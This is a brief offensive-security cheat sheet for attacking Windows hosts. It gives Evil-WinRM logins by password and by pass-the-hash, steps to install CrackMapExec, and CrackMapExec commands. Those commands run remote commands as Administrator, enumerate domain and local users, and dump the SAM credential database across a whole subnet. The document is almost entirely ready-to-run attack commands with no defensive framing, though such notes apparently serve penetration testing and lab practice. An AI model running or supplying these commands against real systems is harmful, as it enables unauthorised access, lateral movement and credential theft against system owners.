Windows


========================Evil-WinRM : 
>>> evil-winrm -i $IP -u username -p password
>>> evil-winrm -i $IP -u username -H <NTLM_HASH_ONLY_HASH_PART>



========================Crack Map Exec================================= 
======Installation : 
>>> apt-get install -y libssl-dev libffi-dev python-dev build-essential
>>> git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
>>> cd CrackMapExec
>>> poetry install
>>> poetry run crackmapexec

======Commands (very few examples) : 
--> Execute 'whoami'
>>> crackmapexec $IP -u Administrator -p 'PASS' -x whoami
--> Show Domain Administrators.
>>> crackmapexec $IP -u 'Administrator' -p 'PASS' -x 'net user Administrator /domain' --exec-method smbexec
--> PS Version Table:
>>> crackmapexec $IP -u Administrator -p 'PASS' -X '$PSVersionTable'
--> List out Machine Users.
>>> crackmapexec $IP -u 'Administrator' -p 'PASS' --lusers
--> Dump SAM Database.
>>> crackmapexec $IP/24 -u 'Administrator' -p 'PASS' --local-auth --sam

====================================================================



